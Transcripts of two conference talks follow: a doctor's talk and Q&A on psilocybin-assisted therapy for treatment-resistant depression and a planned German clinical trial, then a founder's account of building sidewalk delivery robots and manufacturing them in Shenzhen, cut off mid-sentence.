Statistically in Germany, every eighth woman is likely to suffer from a severe depressive episode at one point in their life or the other. People who are depressed lose social functioning. They have very decreased life expectancy partially through suicide, partially because they don't manage to care for themselves. These people lose themselves and are being lost for others too. And there is treatment for depression, yes. But in many cases, it only has a limited capacity. And even though depression is a worldwide epidemic, with rates from 3% of the population in China to 22% of the population in Afghanistan suffering from it, there have not really been new forms of treatment for two, two and a half decades. So the stuff we're working with is partially working, partially not. About one third of patients don't react to the medication at all, even though there's different types. And those who do usually have very low rates of acceptance because of the side effects. Because many people use antidepressants and the best combination is cognitive behavioral therapy. So what is called in German Verhaltenstherapy, cognitive behavioral therapy in conjunction with antidepressants. That might work, but for some it doesn't. And those who take the medication don't feel well. It's not that they're back to normal. They're just less depressed, but usually they're like dimmed in on all sides. So they are still not getting happy. Their libido is decreased, their activity levels are decreased. People are suffering quite a bit from the side effects. It's really not nice. So I was just to tell you one little story. I told you I'm an emergency medicine doctor. And just to illustrate how bad depression can get. A few weeks ago I was being called out to an attempt to suicide. A woman had jumped out of her window on the fourth floor. We found her lying in her yard. And she was injured, badly injured, but still alive. And we stabilized her and took her to hospital. And when the nurse kind of pulled up her data in the emergency room, she went like, oh no, not again. Because this woman had jumped out of the same window just half a year before. That's how bad this disease can be. So how desperate people get. And how terribly important it is for us not to look away but try to find better new therapies. And this is, in my opinion, with psychedelic medicine. Psychedelic therapy can be a real game changer. The one therapeutic application we have the best data for is psychedelics for treatment-resistant depression. There's several studies going on in the UK, in the States, in Switzerland, but also in the Czech Republic and so on and so on. And what they seem to be finding is that even though they're still working with small samples because you have to fan out, if you try to bring out a medication like that, you have to show first that it's safe with healthy people, and then you start with a small sample of sick people, and then you enlarge it from there. And then now in this enlarging process, that's treating depression with psilocybin especially. Does not only decrease depression in those patients, but also does one great thing. It decreases anxiety. We're not only talking about state anxiety, so how anxious people are in this very moment in living their lives, but that trait anxiety, so how anxious people are as a part of their personality, which is a good thing to gauge how likely people are to relapse back into depression. People that are very anxious, very insecure about life, have a far more likely to relapse. 
Okay, so you see, there's a lot happening worldwide studying this. But this is Germany on that, a scientific desert. We're in the largest country, also the scientifically perhaps most important country when it comes to medical research in Europe, there's Zilch happening. There hasn't been a study on psychoactive compounds in this context forever, like 30 years. The last one on a tactigens like 20 years ago, but studying psychedelic here hasn't happened. And we want to change that. Let's... APPLAUSE So we as the Mind Foundation had a groundbreaking conference this September in Berlin at the Charité buildings. We had 600 participants, over 50 speakers from worldwide. Everybody basically, well, most, almost everybody, who's important in this dialogue scientifically was around. So from the pharmacology, the psychiatrists, the psychologists, the therapists, but also philosophers, talking about a culture of all sorts, all the states of mind have been around, and we have been trying to bring this to the German public and try to lay groundwork during new science in Germany. And what's to come next is this. With our PI, principal investigator Gerhard Gründer, who is a new pharmacologist from the University of Mannheim-Zadee, we are about to apply for the first psilocybin-depressant study in Germany this next year. So in 2020, we're putting in the applications, we've already put the first paperwork in. And what we want to do is do a double-centred study, both at the ZDE Mannheim and the Charité Berlin. Those are the two most renowned psychiatric research facilities in Germany. And it's a collaboration from the ZDE, the Charité and the Mind Foundation, each group contributing their knowledge, their capabilities, and their strengths. And what we want to do is this. We want to do a double-blind, randomized, controlled phase 2A study, big word. This basically means that it's a top-notch level internationally acclaimed study. This is how these studies need to be done to have any value. So it's double-blind, meaning that neither the patient nor the therapist know what the patient is getting. It's randomized, so this gets assigned without anybody playing around with it. And phase 2 means that it's a safety and efficacy study. So not yet dose testing and not yet comparing dosages, but just trying to make sure it works. And we are going to do that in 144 participants' samples in total in two locations, which is huge. This will be the second or third biggest sample worldwide doing this, and the first one in Germany, as we said. And what we are going to test is 25 milligrams of standardized GMP, so medical grade psilocybin, versus two active placebo. One being a small dose of psilocybin, which used to be the standard thing to do, but now talking about microdosing, what is if the small dose already does something? And testing it against another placebo that isn't psilocybin, which is some physical reaction, but is not psychedelic in this sense. So in this design, every patient will receive at least one or some two high dosages of psilocybin, so everybody who gets accepted will have his try. And the study design consists of preparation sessions, dosing sessions, where people receive either placebo or psilocybin, and integration sessions. Integration is so important. 
And not only in a scientific study on this topic, but if people are working with psychedelics, experimenting with psychedelics themselves, integration is the key to do something with the experience, because if you don't work with it actively, the experience is going to fade. And you might remember something about what you learned, but it will not have the impact on you, your life, and how you benefit from what you've seen and learned in that way. Right. Just one more sentence. It's mixed funding. It's funding in progress. So we have some public money coming in, but we're also looking for donations and investment just at the side. And this is almost the end of my talk. What I want to say is the following. What we try at the moment is to establish safe and legal psychedelic therapies in Germany, Europe, and the world. This is going to take time. If things go well, we might be there in five to ten years, five things go really well, and I know that it's very tempting for many people to say, well, I can just go to somebody and have a psilocybin session. I can go to somebody and have an ayahuasca session. And yes, you can, but be aware. If you do that because you're really suffering from a psychiatric disease, if you have a mental illness, if you really are in distress, be very careful with yourself. Because the thing is, you need somebody to really support you, really help you through somebody who really knows what they're dealing with, because otherwise you can do yourself more harm than good. This picture down there with the ambulance is a real picture. Right. That's what I wanted to say. Thank you very much for having me. If you're interested in what we're doing, check it out. APPLAUSE Andrea, thank you very much. That gives us plenty of time for some questions. People are lining up on the microphones already, so we start with microphone number two, please. Hi. Thank you for this amazing talk. That's really great. Just one question. Wouldn't that be a problem for a double blind study? A person can surely tell if they're experiencing psychedelic effects. That is a problem, yes. But this is the way the authorities request a study to be done. And interestingly enough, there have been cases where people couldn't tell. People thought they were either on a small dosage or on a thought they were on the high dosage, even though they were on an inactive placebo. So the self... Self-suggestive capabilities of people should not be underestimated either. OK, then we're going to jump over to number six. Thank you very much for the talk. I would like to hear your opinion on the fact that, like in the last 150 years, most drug agents were discovered in Germany, and meanwhile we have the pity of scientifically Germany lying in Arizona. Right. Germany has two points that historically hold us back. One is the forced human trials during the Nazi era, where substances, techniques were tested on concentration camps, prisoners, and we have the Contagane scandal that harmed so many people and led to, in all of the world, the stricter rules we have now. That's two reasons why Germany is so reluctant to expose itself in this kind of process. But still, it is a pity, and I think it is about time that the German, not only government, but also the scientific establishment, gets to understand that they lose out, and they're trading behind a development that has started and will continue. And now we have a question from the internet, I hear. 
Yes, for people struggling with depression, anxiety, or mental illnesses, what specific options are there in Europe with regards to psychedelic assisted therapy? One is that you can try to participate in the existing trials. For example, in London there's King's College, Imperial College, there's a group in Bristol working, there's also therapy happening in Switzerland, and so on. And there's also, if you happen to be lucky enough to live in Switzerland, there's the so-called compassionate use, where psychiatrists with special permits are allowed to use LSD and MDMA as therapeutic agents on a case-to-case basis that they have to discuss with the authorities. So that's all we can say for now. Study participation or compassionate use, and we just really hope that things will rev up and we'll be able to offer more in the future. And microphone number four, please. Yeah, hello. Thank you very much for your talk. My question is more related to the history of the uses of psychedelics in the West and to the MAPS Association founded by Rick Doblin. But I was curious, how would you explain that MAPS is so actively criticizing the experiments led in the 1950s and 60s by the CIA, and yet they accept donations of several million dollars coming from the Mercer family who are among the largest shareholders of Cambridge Analytica, Breitbart News, and they also accept that recently about three millions from members of Tea Party. Isn't it a bit of an irony here? That is a very good question. The way I know Rick Doblin and many people from MAPS personally, I know that they're pursuing an honest goal. What they're trying to do is bring this into the world. They have been doing that since 1986. So they've been on this for almost 35 years and he's dedicated his life to doing that. I don't fully understand his motives. I don't have to, to be honest, because I'm not speaking for him. I think there is a huge necessity for integrity, because if we don't, as people working with us scientifically, if we don't move along with the necessary integrity, we're opening the doors for other people to don't care at all. But on the other hand, finding the money, getting this done, and a lot of, Rick was criticized a lot, for example, for accepting veterans, snipers from Iraq into his therapy program. Like, okay, are you not getting people fit again to go out back to the battlefield? And I find this all very difficult, because there is a thing that is called perpetrated PTSD. There is a thing of people only realizing afterwards what they have done. And I would not, I would be very careful in judging people in distress. But you're very right. It's a very delicate topic, and I think we all have to be very aware that there are thin paths as we are threading in what we're doing there, when we accept money that comes from sources that don't follow ethical standards. Then we're going to switch over to microphone number five. Hello. I guess you have a really nice answer to the following statement. So I hope you will share your answer. Little Greta Twitter today that the house is on fire, and just that. So actually that means an adequate reaction would be to jump out of the window. So you could argue that actually we should rescue all the people that are really down, like down and out, because they cannot help us anymore. But actually we should get the people that are still happy to be able to breath instead of all getting them happy. What do you say? There's always two ways of dealing with the system. 
You can step out of it, and you can try to change it from within. It is always very difficult to go from caring for the individual to things that are right for all. And me being a doctor, for example, I have simply decided to put the individual in the center of my concern, and I think others need to put the greater good in the center of their concern. I think it's inconsolable. We can't do both at the same time. So I think it's important to make a decision and do this what you do with all your heart. Then we're going to switch over to the internet again. Yes. Do you know of any studies or evidence corroborating the other side, like triggering mental illnesses by using psychedelics, for example, if you have a family history or... Well, doing a randomized control study with that would be unethical. What we have is the epidemiological and the anecdotal evidence that is found. So yes, if you have a predisposition for psychosis, for schizophrenia, for mental instability, there is a large chance of triggering that if you use psychedelics. But on the other hand, many people try to self-medicate with substances, be it psychedelics or cannabis, because they're feeling they're already on the edge of some instability. But the current paradigm for the studies is to exclude people whose direct family is affected by psychosis. Number two, just disappeared, so we're going to go straight over to four. I would like to ask you whether you changed your mind about anything related to psychedelics in the last few years, or if you have seen something in research that really surprised you. Well, I am worried in a few respects. For example, the whole development around the five-meo scene, people using Bufa Avaria's toxin for very, very strong... like they experience, sometimes risking their life doing it. This whole scene kind of lifting from the ground and going in a very strange direction, in my opinion. This is kind of worrying me, because I think people are not taking the care they should be taking of themselves in what they're doing. But otherwise, I think scientific results we're seeing are rather consistent. It's very important to know that these are not magic bullets, they don't expect too much. You can't expect something to cure everything. Psychedelics seem to be a good idea for people who are rigid, to not be able to transcend something, but people who are already in a chaotic state are very unlikely to benefit. I think that's a very good basic rule, and this is something I see proven time and time again. Number five, please. Hi, thanks. Regarding set and setting and how it can have such a huge influence and experience, can you comment on the setting of the new psilocybin study in the upcoming year? Like all the studies that are being done, set and setting are being taken into consideration. These people don't trip in a sterile white hospital bed. They get to have their psychedelic experience in a warm, comfortable, organic, welcoming environment. For example, on a couch with a nice cushion, nice dim light, flowers, music is extremely important. There have been really scientific works around what kind of music is beneficial for this. Mendel-Caitlin, for example, at Imperial College, is a specialist in this kind of music. It's being taken very seriously. Also, those questions of how much physical contact is beneficial, is allowed, what could harm the patient, is discussed very precisely in all those groups I know, because this is so much more than just a pill. 
This is really about making sure that people have a safe experience where they can come to healing inside themselves. Thank you. So we have time for one more question. Number one, please. I don't know if I want to hear the answer, but do you think it would help your cause if we would stop taking these drugs for fun? My answer to this is the following. Imagine there was a food thing, something that tasted nice. Let's say chocolate. And there were people who could only survive if they got chocolate, but because everybody else was doing it too and was somehow not okay, it would be forbidden for everybody. Then I would say, well, if you replace chocolate with LSD, I think there are people there who really need it, and we have to be careful that recreational use and playing around with drugs doesn't spoil their chance to something life-saving, because they need the chocolate. You might get along without. But it's something we have to take into consideration. And this doesn't mean it's wrong to have, like, experience for your own benefit, for your own betterment, for your own fun. But just keep in mind, if you're hindering with your wanting to have a good time, that somebody gets a life-saving therapy, perhaps, then this is an ethical problem we are facing. Andrea, thank you so much. That's your applause. Thank you.
Psychedelic research constitutes a challenge to the current paradigm of mental healthcare. But what makes it so different? And will it be able to meet the high expectations it is facing? This talk will provide a concise answer. Psychedelic Therapy is evolving to be a game changer in mental healthcare. Where classical antidepressants and therapies e.g. for Posttraumatic Stress Disorder often have failed to provide relief, substance assisted psychotherapies with Psilocybin, LSD and MDMA show promising results in the ongoing clinical trials worldwide. A challenge to the current paradigm: Unlike the conventional approach of medicating patients with antidepressants and other psychotropic drugs on a daily basis for months and years at a time, Psychedelic Therapy offers single applications of psychedelics or emotionally opening substances such as Psilocybin, LSD and MDMA within the course of a limited number of therapeutic sessions. The clinical trials conducted in this kind of setting are currently designed around depression, substance abuse, anxiety and depression due to life threatening illnesses, PTSD, anorexia and social anxiety in Autism. Though the results look promising, it is important not to take these therapies for a “magic bullet cure” for all and very patient will mental issues. This talk will outline the principles of psychedelic therapy and research and provide a concise overview of what psychedelic therapy can and cannot offer in the future.
10.5446/53197 (DOI)
So Sasha is an attacker with a weak spot for LEDs and completely abstains from HDMI adapters these days. He wanted to share with us the experience of attempting to build delivery robots in the past 2.5 years in the Bay Area. And so, yeah, let's give him a big welcome. Thank you, Mikhail. So just to show of hands, who here has built robots before? Oh, that's quite a few people. What about autonomous robots? Did he build autonomous robots? Still quite a few people. Well, today, I'm going to be sharing with you the story of how not to build autonomous robots. Over the course of the past 2.5 years, together with my team, we built the world's largest robotic delivery infrastructure. We went from a concept sketch to a commercially viable service running in three cities. We've had lots of successes and one or two failures. So over the course of the next 45 minutes, I'm going to be sharing with you a couple of different stories. First of all, I'm going to briefly introduce myself. Then I'm going to share the story of how we built robots, the different prototypes we had, the different iterations that we tried. I'm going to jump on manufacturing. We actually went to China and scaled up our manufacturing and production line. I'm going to share with you the story of how we did that. Finally, I'm going to talk about AI and all the magic that is artificial intelligence. So we'll be able to see how we were able to crack that puzzle. So without further ado, let's do the introduction. This is me. Hello, dear. I like to build things. I built my first website when I was 11 and I built my first business when I was 13. It was an iPhone repair business that I was running out of my bedroom. I've been really, really passionate about building things. And over the course of many years, I built a couple of different startups. One of them was a food delivery platform. We ended up running three different cities and doing hundreds of deliveries a day by the time I was 19. So I got to experience startups pretty early on. I've been really enjoying that time. After this food delivery start failed, I went to some cryptocurrency startups and then went to work for big corporations. And that was actually very boring. I'd doored my office with some supplementary graphics. After a while, I got a little bit bored of this corporate life. It wasn't really for me. So I decided to get a one-way ticket to San Francisco. So I ended up in San Francisco staying on a friend's couch, not really knowing anybody. And I was really fortunate to be introduced to an incredible group of people. And over the course of about two and a half years, we started to take a concept, a sketch that we had, and we built up a robot. At first, it was something that barely even worked. But then we gradually got to something that worked a little bit better and better and better. After a while, we actually managed to build a whole fleet of robots. I think at the peak, we had 150 robots. So it was a really, really cool experience. And during that time, I got to meet the Lieutenant Governor of California, got to figure out how to do manufacturing in China, and most importantly, work with an incredible team, who had a lot of fun with building these robots. So yeah, that's a little bit about me and what we were building. And maybe now we can jump into how not to build robots. So those are our very first robots. This is a really small prototype we built. It was basically a shopping basket on wheels. There's an RC car there below. 
There's a shopping basket and there's Arduino Raspberry Pi. It didn't barely work, honestly. It was really, really hacky. And what ended up happening is that most of the time, we just dropped off the robot in front of the customer. It's like literally just like dropped it in front of the door just to see if they would like order food with robots. Bouncer was overwhelmingly yes, so we decided to spend some more time building out technology. There's a small, I don't know if you can see it here. Yeah, there you go. There's like a small orange holder. That's actually a phone holder. So our very first prototype, it had a phone sitting on top of it, doing a video call so that somebody can remotely control it from Columbia. So we really started off small, really humble, just to see if it would work. And that's something that we do a lot of, just being really resourceful in terms of trying out things. After about a year of this, we moved on to something that looks a little bit more like this. So we started playing around with the shape. We started playing around with the design. We noticed that people responded really positively to faces and to things that looked like people. So we actually built in a face. So we took this little animation that we built and we put it onto the robot. And this is actually really, really positive. We had a lot of good responses from the community, a lot of great feedback. And what we've seen is that people really love to have robots that are kind of friendly. There was another company that deployed robots that looked like vending machines or almost like tanks in San Francisco. And they got banned really, really quickly. So we decided that we would do our best to make sure our robots were as friendly as possible instead of threatening and scary. So that was a very important part of it. After another year, we ended up scaling up our production and we went to China to manufacture robots. And here, this is where we ended up here. It's actually a really cool robot. We built it entirely from scratch. We built it on chassis, our own cabin, our own compute module, the system, just about everything. It was a really cool experience. That was me. So yeah, that's a robot. This is the one we were rolling around the past six months. And we also had some failures in between, as you saw previously, this one. So we actually tried a couple of different concepts. So this was one of them. This was a Kiwi trike. We thought that maybe we can figure out how to have robots do part of the delivery and then trikes do another part of the delivery. We also tried to do restaurant robots. We had robots that are sitting in the restaurant and bring food out from the counter to your doorstep. But what ended up happening is that it was actually pretty inefficient and people would wait a really long time for their deliveries. So it was very important for us to try a lot of different things. We tried this robot, the Kiwi trike, that did not quite work out as we expected. We tried a restaurant robot. We tried a box that would sit behind our robot. We tried a hub that would have a bunch of different robots inside of it. So we really, really tried a lot. And with every iteration, we constantly tried new techniques. We constantly tried new manufacturing methods. We really tried just about everything to see if we could make it work. And what we ended up building is a platform that was really loved by people. We built a platform that students adored. It was our primary demographic. 
We were delivering to college campuses. And students really loved our products. We actually had people dressed up as Halloween costumes. We had entire classes go for Halloween and the Kiwi Bar costumes. So it was really, really cool stuff. It had a lot of great support, a lot of trust from the community as well. And that's like coming back to the design, that aspect of having a friendly robot that mesh seamlessly within the fabric of a community is like super, super important. We've seen other robots around and they were maybe not as friendly. Maybe they looked a little scary. Maybe they had something that was a bit off or maybe a little too industrial. But having a friendly robot that could become a meme, that was something truly revolutionary, something that really changed the landscape. And as a matter of fact, these Kiwi Bots are the only robots that are deployed somewhere in the world where they coexist day to day with the community, with people. You have some limited deployments of robots here and there. Maybe you have a room bed home or something like that. But you don't have any large-scale deployment where you have robots and people living in the same city all the time. So of course, it took us a while to figure out what to do and how to do it. At first, one of our models was to have robots deliver the entire meal. Like go from the restaurant all the way to the customer and we would have a robot do that delivery. It turns out it was pretty inefficient. People would wait like 60 minutes, 90 minutes for their delivery. And we realized that maybe automating all of that was not the most efficient approach. So what we instead did is a multi-model approach where we had people and robots. This is actually a really cool visualization that my team came up with. The blue lines are robots. So these are robots roaming around our Berkeley coverage area. And then the yellow lines are people. So how this would work is that people would go to restaurants, they'd pick up the food, and they'd take you to a cluster. So they'd take you to a cluster where you had a bunch of robots. They'd load it into the robot and then the robot would actually do the last few hundred meters to your doorstep. And because we were able to do this, we were able to go and build a platform that handled hundreds of orders a day with very, very few people. I mean, labor costs are really high for delivery. You would be paying somewhere between five and $13 to get a meal delivered in the US. And as a student, that's like super expensive. It's not something that you can afford to do every day. And also there is a pretty big shortage of people who want to do this job in the first place. The churn is really high. People are leaving all the time because they don't like to sit in the car all day and just deliver food. So that's why we have this parallel, this multimodal approach where people are biking around, they're enjoying their time outside, and the robots are actually doing all the boring stuff, like the waiting. So the robot would go up to your doorstep and it would wait for you to put on your pants, your shoes, and to actually walk outside. So that way we were able to change the dynamic. We were able to change our efficiency from one or two deliveries an hour, as you would have for a traditional delivery service, to as much as 15 deliveries an hour per person. 
So it made the delivery far more affordable and we were able to offer delivery at just $1 delivery, which is a cost that changes completely the way people approach delivery. And in fact, if we look at our top 20% of users, they were ordering over 14 times a week. So they were very, very happy that they could get whatever they wanted very quickly. Of course, not everybody was super happy. So we did have some people that didn't fully appreciate the magic that is the QE buy. So we did have one person try to steal it, but they didn't get away with it. We found them pretty quickly. And they hit it in the trunk. Not a very smart move. We ended up finding it with GPS and also triangulating the Wi-Fi. So this guy decided to steal it because he doesn't like robots. I don't know why, but he was clearly very passionate about that topic. And he stole it and now he's in jail. So yeah, don't steal robots. So maybe some conclusions from our robot part, like from building robots, from figuring out like what to do and what not to do. A really important thing that we do a lot in software, but maybe not as much in hardware, is iteration. Like, we iterated through three major revisions and like lots of small revisions during a really small period of time. It was really interesting to see like that transition. Every single time we tried something new, we tried maybe for like 20 robots at a time. Like not our whole fleet. We just tried for a small portion of our fleet. And that way we were able to iterate really quickly and see what sensors work, what cameras work, and just to see what we could do in order to grow the product. So it was very important to iterate. Communication. Communication is absolutely fundamental. And not only communication like inside the company or anything, but more importantly communication with your community. Because we weren't just building a product in isolation. We were building a product for people who live in a city who have an established life and we're kind of intruding into their life by bringing in a new product that takes their sidewalks. So communicating what we're doing, showing them what this is and what this robot does, is super important. And actually very early on, our designs had no text in it. They had like no information. It was just like a basket case on our C-car. And people were really confused. The police were like, hey, what is this? So we had to add a lot of communication. We had to put food delivery on the robots really clearly. We had to add a license plate with a phone number that somebody could reach out to us. So communication is very, very, very important when it comes to robots. Also scaling hardware is hard. Super hard. I mean, it was crazy. When we first started, it was just arduinos and Raspberry Pis. And that did not scale really well. Like sure, we could have maybe 10 or 20 units at once, but then how do you handle updates? How do you handle, I don't know, just weird things that happen all the time? So it was really challenging to do this. We actually killed a bunch of SD cards. Didn't really know you could destroy SD cards, but you can. And we learned a lot of things about hardware, pushing it beyond its normal boundaries. So yeah, iteration, super important. Communication is key. Like getting by from your community. And scaling hardware is super, super hard. That's something we actually figured out how to solve by going into China. So how to do or how not to do manufacturing. 
So as every China story goes, I hopped on a plane and I ended up in China. And it's really interesting to see because like you have this perception of China from the media. You have this idea of what it would look like. But the reality is it doesn't look anything like what you would expect. It was a completely different world. It was at the same time Blade Runner and like the most modern city in the world. And it was truly an awesome experience. I highly recommend anybody who has the opportunity to go in and explore the world. But of course, the culture is a little bit different. We were surprised to see some things happening there. It was a weird dichotomy between communism and consumerism. It was kind of interesting to see that sometimes. So the reason why we came to China is for manufacturing and there's no better place for that than Shenzhen. And Shenzhen you have Huasheng Bay. It's this huge market. It's a market that spans several city blocks. And you can actually find anything and everything you want. We were able to get components super quickly, super easily. And you can spend days just walking through a single building finding different things. There were entire city blocks dedicated to just LEDs or just connectors or just processors. It was absolutely crazy. You could really, really, really get lost inside of these mazes. And what was really incredible to see and something I've never seen anywhere else in the world is just how easy it is to get hardware, to get things, to get parts. It was super easy to just go in and get something. And you could get it at one piece, two pieces, or a thousand pieces instantly. And if you're anywhere else in the world, that's super hard to do. So just by this virtue, you're actually able to prototype things. You're able to build things incredibly fast. You're able to go in. You're able to commission a PCB and get all the parts almost instantly, which is not something you see anywhere else in the world. And also a lot of the manufacturers have their booths here. So these would be direct booths from the manufacturers. You can go up to them, start talking to them, and ask, hey, can you make this product this specific way? Can you do it how I want it? And they'll be like, sure, why not? And they'll do it for you. So it was really, really valuable to just learn from these people, from the vendors here, from the manufacturers about how to build things. And it was actually really surprising to see everything they have in stock. Two years ago, we built an oscillation here that covered a tunnel with LEDs. Covered one of the tunnels at 343 LEDs. And we used this tiny, tiny chip. It was a $5 ESP266 chip that basically was able to control all your LEDs. And over the course of five years, up to that point, I spent a lot of time figuring out how to build it myself. I played with Raspberry Pi. I played with PCA controllers, over Serial. And I finally managed to get a prototype to work. But it was super clunky, super expensive, and it wasn't very reliable. Then I go to China, and I find that it's available there in much better quality, much cheaper, much faster. So it was a really, really interesting shift in perspective. It's something you can't appreciate when you're abroad. Even if you're browsing like eBay or AliExpress, it's kind of hard to appreciate just how much selection you have and how you can find just about any tool, anything you need to find. So it's really, really incredible. But these markets are cool. But what was even cooler are the factories. 
And during our course in China, we were able to visit a lot of factories. All these factories, they were super, super welcoming. They always loved having you over. They invited you to really, really luxurious dinners where you have way too much food. And it was a feast and celebration every time. Actually, relationships are super, super important in China. A lot of people in the West, they have contracts, and they say, OK, this is the terms of the contracts. Well, in China, you do sort of have contracts, but they don't matter as much as relationships. When you have a relationship with a manufacturer, you have to always go to dinner with them, drink beer, smoke, go to KTV. It's a really involved relationship, and you're only able to have good communication based on that relationship. Because if you don't have a relationship, they kind of forget about you. And we actually had a couple of instances where manufacturers ghosted us. They had a critical component, and they just stopped answering our emails. They stopped answering our WeChat. They just completely ignored us. And for some pieces, they were completely irreplaceable. Like, we could not just go out and find another factory to produce a specific part the way we wanted. And the only way you can ensure that this doesn't happen is by really explicitly making sure that you have good communication, a good relationship with that manufacturer. So it's super, super important. This is one of the factories we worked with. It's really crazy. I mean, we went there and we were just absolutely blown away by the scale of everything, and also blown away by how manual everything is. There's actually audio here. Everything was super manual. People were just like there with minimal or no protective equipment whatsoever, just like building things that looked like they were made by robots or machines, but they were in reality just built by people with the hands, which is super crazy to see. And there were a lot of Blade Runner-esque designs, really bizarre contraptions there in this factory. This is our fiberglass factory. The way we built our case casing, sorry, was actually prototyping it first in fiberglass, and then moving on to a mold in carbon fiber. And actually Scotty, he made a really cool video on YouTube. So if you search for Hockey Stick Factory on YouTube, you can see a huge video where my buddy Scotty actually goes with me to this factory to discover how they make this mold and how they make these carbon fiber things. It was actually really crazy to see. It was cheaper to make a carbon fiber mold than was to make a plastic mold. So since the tolerances were a little bit different, since the process was a little bit simpler, you were able to make a mold that was very, very strong and very indestructible without necessarily having to have all of that expense up front for a plastic mold. So yeah, that was our fiberglass factory. Really exciting stuff, really crazy scale. These folks, the first night we came there, we arrived at 8 p.m. and there was 100 people in the factory just working at 8 p.m. It was really crazy to see. This is another factory we worked with. So this was a metal factory. It was actually really, really, really interesting to see how they built all these things. At one hand you can build super complex things. You can build super complex designs. But on the other hand, we got surprised a couple of times by being unable to manufacture really simple designs. 
And it took us a while to get a grasp of like, oh, okay, so we can make really complex metal that's bent, but as soon as we add a weld to aluminum, you start to have a big, big problem. So we had to change a lot of our designs. We had to really adapt to the way things were being made in China. You could adapt yourself at the same cost, so it was better to adapt to the way things were being done there. So again, very, very interesting to see how things are done. No protective equipment. This is like a two ton press and his hands are millimeters away from it. So yeah, it's a different world out there. Very, very different. Another factory we visited was a PCB factory. So this one actually has a really interesting story. This factory is not in Shenzhen. It's just across the border from Shenzhen. The city actually passed a law a couple of years ago that has very, very strict environmental policies. So you're no longer able to do PCB manufacturing inside the city anymore. So we actually had to drive for a couple of hours outside of the city and over there was a huge plant. And this plant was kind of semi automated, semi handmade, sorry, where parts of the process were done by hand as you see here, but then parts of the process were done with the machine. So they had this giant machine, which is basically like a black box you can't really see inside of it, but you had a bunch of chemicals and just like take a PCB and just like move it forward through a chain. So it's really interesting to see. And this factory also had a really quick turnaround. They had a three hour turnaround. If you paid a premium and like standard, it was 24 hours. You could also ask them to do PCBA so you can actually get them to assemble the PCB for you. And we ended up doing that for some of our PCBs. We'd like give them a bill of materials and we'd give them our designs and then the machine manufacture it. We actually got in a little bit of a situation with that because we sent them some designs, we sent them some parts that we wanted to put in our PCB. And it turns out that one of these parts was unavailable and they didn't tell that to us until it was almost Chinese New Year. So we had to scramble a little bit to find another solution. It was very interesting to see how you would deal with these factories. There were some even cooler factories. I think the coolest factory I visited was a battery factory where they made lithium ion and lithium polymer batteries. It was almost entirely automated. You had giant films of things going into a machine and then you had all sorts of liquids and powders that was combined together. It was super, super cool. It didn't allow us to film it, unfortunately. There were maybe only a dozen such factories in the world so they're very protective about their technology. But the scale of how quickly they're manufacturing these batteries was just incredible. They were manufacturing them at a crazy, crazy scale. So all these factories are cool but actually building things is even cooler. So we ended up partnering with a contract manufacturer. I was really fortunate to find one through my network. Otherwise I would have been totally lost. A couple of days before I ended up going to China, I found a contract manufacturer that liked to work with startups with small scale people and we ended up working with them to build our first batch of 50 robots. It was really interesting to see how different our designs were to what they expected. So they expected things are really ready. 
They were very explicit, very clearly specified. But we didn't have that. The difference between manufacturing in the US, for example, against China is that in the US, it's a super long process and the back and forth takes super long just to get an idea of what kind of files they need. Whereas in China, you're able to sit down directly with the engineer, with the person in charge and you can figure out what they need and they can help you out instantly. Actually, just here, I just want to show you one thing. So this is my designer, Alejandro, and he was translating from English to Chinese with his phone with a Google translate. And it works surprisingly well. Google translate actually is not blocked in China for some reason. We were able to communicate almost all the time with that. Also WeChat has a built in translate feature. So WeChat is this universal app that everyone in China uses and has this built in translation feature that can translate your text automatically. So it was really, really cool to see how that worked. One question that we get commonly asked is how do we find our manufacturers? How do we build these relationships? So about 20% of that was Alibaba. So our fiberglass manufacturer, we quoted like 30 different manufacturers and went with the cheapest one. Of course, it was far more expensive than we expected. And we ended up working with them. 20% like for example, our chassis, it was built with companies that we already had a relationship with. So we were just able to continue working with them. And then 60% was through just references. So just like the network, just getting to know people and talking to them and saying, oh, hey, who did you use for this or this or like, how did you make these PCBs? Or just getting a conversation going. So having that kind of network was really, really helpful in order to build these robots. So as you can actually see over here, our design, this is what we had when we came into China. When we left, we had our own compute module like super sophisticated, but this was like a Raspberry Pi, a PIXHawk, and a voltage converter, like a DC to DC converter. That was pretty much it. As you can see, it's not very reliable. It would break a lot. So it took us quite a while to translate this into something that was manufacturable. So thanks to the dedication of my incredible team that we were able to do that. And we kind of did not know what we were doing. So we ended up having all of our parts and all of the components ready just days before Chinese New Year. So we actually had to do all of the assembly ourselves. We didn't have any Chinese workers who could help us do it. So this is our team just assembling things in the factory, maybe like one or two days before Chinese New Year. So that was very, very interesting. We kind of hacked or tried to hack Chinese New Year. We assembled all of our robots literally days of no hours before Chinese New Year. And we shipped them out and everything was great. Except our robots got stuck in customs. We had a trademark on our box. And the customs agents, they opened the box and they saw more trademarks on some parts. We had three printed parts. And they're like, no, this is not going to go through without the proper paperwork. So our robots got stuck for three weeks in China, which was really fun, a little problematic. So yeah, those kind of things happen. You have to be ready for it. 
After we received our robots in California, we had to spend another like maybe one or two months refinishing them, redoing some parts, tweaking them, flashing them. So it was still a lot of work to get them to work. The pieces we shipped out of China were maybe just like a case with most of the electronics in it, but not all of it. So we still had to do a lot of tweaking back home. And of course, all this wouldn't have been possible without an incredible team. So I was really fortunate to be with some really, really passionate people, some people who would work four months in a row continuously without virtually taking any breaks. We had plenty of opportunities to go and take the high-speed rail, go to Shanghai or even Tokyo. But we all stayed in Shenzhen and spent a lot of time together building these robots. So it was a really, really arduous journey. So maybe some conclusions for scaling manufacturing and some of the failures we've had. Relationships: I mean, relationships are super important. They're like super, super important in China. Far more important than contracts. If you're able to have a good line of communication with your manufacturer, that really, really helps out. Because if you don't, things can go bad. We've had manufacturers that ghosted us, manufacturers that completely ignored us, or manufacturers that just replaced components because they just felt like it. So relationships are super important. Don't hack Chinese New Year. We tried it. It doesn't work. It's a thing. China just shuts down for like two or three weeks. So it's really, really important to respect that. People buy tickets to go to their hometowns like months in advance, and they're not going to move it for just like some pesky thing that you're building, especially if it's like some small scale thing. So yeah, don't try to hack Chinese New Year. It did not work out well for us. Also: do it with a team. While I was in China, I saw a couple of solo entrepreneurs try to build their own thing, and it was super, super hard, super stressful. Having a team is really great, especially in like a foreign place where you don't really know anybody, having that team there together to support you is super, super important, especially since you're kind of multitasking, you can like split responsibilities and do something together. So it's a really, really important aspect. So that's how we manufactured, and some of the failures we've had. Now let's talk about how not to build AI. So as we all know, AI is magic, right? Just like blockchain and IoT and the cloud, it's absolutely magic, right? Well, the reality is it's not that magic. So we decided to have a very pragmatic approach to AI. We said, let's not do anything crazy. Let's just make something that works. So our very first iteration of our robot was 